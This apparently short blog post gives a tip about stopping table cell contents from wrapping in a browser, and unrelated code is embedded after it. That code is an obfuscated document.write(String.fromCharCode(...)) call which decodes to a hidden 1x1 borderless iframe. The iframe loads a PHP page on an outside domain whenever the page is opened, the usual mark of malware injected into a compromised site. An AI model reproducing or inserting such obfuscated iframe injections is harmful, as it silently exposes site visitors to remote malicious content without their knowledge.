I

Don’t try to understand what Microsoft says but just remember that if you want to prevent the contents of a cell from wrapping you need to make the cell wide enough so it can support it’s unwrapped contents. Otherwise you will still experience wrapping contents when the browser window isn’t big enough to show the full table.

document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))

Leave a comment